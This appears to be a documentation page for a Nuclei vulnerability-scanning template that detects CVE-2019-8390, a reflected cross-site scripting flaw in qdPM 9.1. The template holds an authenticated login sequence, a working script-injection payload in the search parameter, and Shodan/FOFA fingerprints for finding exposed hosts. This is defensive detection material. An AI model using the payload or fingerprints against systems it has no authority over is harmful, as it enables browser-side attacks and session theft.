Skip to content

qdPM 9.1 - Cross-site Scripting

ID: CVE-2019-8390

Severity: medium

Author: theamanrawat

Tags: cve,cve2019,xss,qdpm,authenticated,edb

qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter.

id: CVE-2019-8390
info:
name: qdPM 9.1 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor.
reference:
- https://www.exploit-db.com/exploits/46399/
- http://qdpm.net/download-qdpm-free-project-management
- https://nvd.nist.gov/vuln/detail/CVE-2019-8390
- http://sourceforge.net/projects/qdpm
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-8390
cwe-id: CWE-79
epss-score: 0.01911
epss-percentile: 0.88548
cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: qdpm
product: qdpm
shodan-query: http.favicon.hash:762074255
fofa-query: icon_hash=762074255
tags: cve,cve2019,xss,qdpm,authenticated,edb
http:
- raw:
- |
GET /index.php/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=
- |
POST /index.php/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
search[keywords]=e"><script>alert(document.domain)</script>&search_by_extrafields[]=9
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'alert alert-info alert-search-result'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="login\[_csrf_token\]" value="(.*?)"'
internal: true
part: body
# digest: 4a0a00473045022100c724b3e90da8f16f093f2fb19c37147fea3cd35f490350a9c0e106c7674a11d3022053817be5b8e30bc7c4392b0e9d5f8531fe437d851e3f0c3ebbed645f22272d9c:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-8390.yaml"

View on Github